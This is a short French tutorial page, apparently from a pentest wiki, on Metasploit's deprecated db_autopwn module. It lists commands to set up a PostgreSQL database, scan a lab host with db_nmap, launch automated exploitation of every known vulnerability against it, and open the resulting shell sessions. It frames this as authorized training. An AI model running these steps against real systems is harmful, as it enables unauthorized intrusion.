Db autopwn
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Exploitation automatisée via base |
| Module | db_autopwn
|
| Contexte | Metasploit |
| Voir aussi | Auxiliary · Browser autopwn |
db_autopwn s'appuie sur les résultats d'un scan de ports stockés en base pour essayer l'ensemble des vulnérabilités connues de Metasploit contre les hôtes découverts.
Préparation de la base
su - postgres
psql
create user test with password 'test';
create database cdaisi_db;
Scan et exécution
msfconsole
db_connect test:test@127.0.0.1/cdaisi_db
db_nmap 192.168.0.10
load /usr/share/websploit/modules/db_autopwn.rb
db_autopwn -t -p -e -s -b
En cas d'erreur de chargement, localiser le fichier avec locate. Récupération des sessions obtenues :
sessions -l
sessions -i 1
Voir aussi
- Auxiliary · Browser autopwn
db_autopwnest déprécié dans les versions récentes de Metasploit